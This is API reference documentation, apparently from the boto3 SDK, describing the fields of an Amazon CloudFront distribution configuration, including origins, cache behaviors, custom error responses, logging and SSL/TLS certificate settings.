Quantity (integer) -- [REQUIRED]The number of origins for this distribution.
Items (list) --A complex type that contains origins for this distribution.
(dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin.
For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference .
Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution.
When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide .
DomainName (string) -- [REQUIRED]
Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com .
Constraints for Amazon S3 origins:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com .
Constraints for custom origins:
DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters.
The name cannot exceed 128 characters.
OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name.
For example, suppose you've specified the following values for your distribution:
DomainName : An Amazon S3 bucket named myawsbucket .
OriginPath : /production
CNAME : example.com
When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html .
When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html .
CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want.
Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution.
Items (list) --
Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items .
(dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution.
HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide .
HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field.
S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is:
origin-access-identity/CloudFront/ID-of-origin-access-identity
where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity.
If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead.
HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on.
HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on.
OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin.
OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS.
Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin.
Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution.
(string) --
OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior.
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements.
Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution.
Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items .
(dict) --A complex type that describes how CloudFront processes requests.
You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used.
For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference .
If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error.
To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element.
To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution.
For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide .
PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution.
Note
You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / .
The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior.
For more information, see Path Pattern in the Amazon CloudFront Developer Guide .
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CustomErrorResponses (dict) --A complex type that controls the following:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items .
Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration.
(dict) --A complex type that controls:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration.
ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true:
The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* .
The value of TargetOriginId specifies the value of the ID element for the origin that contains your custom error pages.
If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document.
We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable.
ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example:
Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted.
If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors.
You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down.
If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document.
ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available.
If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document.
For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Comment (string) -- [REQUIRED]Any comments you want to include about the distribution.
If you don't want to specify a comment, include an empty Comment element.
To delete an existing comment, update the distribution configuration and include an empty Comment element.
To add or change a comment, update the distribution configuration and specify the new comment.
Logging (dict) --A complex type that controls whether access logs are written for the distribution.
For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted.
IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies .
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations.
If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance.
For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing .
Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution.
If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
ViewerCertificate (dict) --A complex type that specifies the following:
Which SSL/TLS certificate to use when viewers request objects using HTTPS
Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names
The minimum protocol version that you want CloudFront to use when communicating with viewers
For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide .
CloudFrontDefaultCertificate (boolean) --
IAMCertificateId (string) --
ACMCertificateArn (string) --
SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients:
vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges.
sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following:
Use the vip option (dedicated IP addresses) instead of sni-only .
Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png .
If you can control which browser your users use, upgrade the browser to one that supports SNI.
Use HTTP instead of HTTPS.
Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate .
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following:
If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed.
If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion .
Certificate (string) --Include one of these values to specify the following:
Whether you want viewers to use HTTP or HTTPS to request your objects.
If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net .
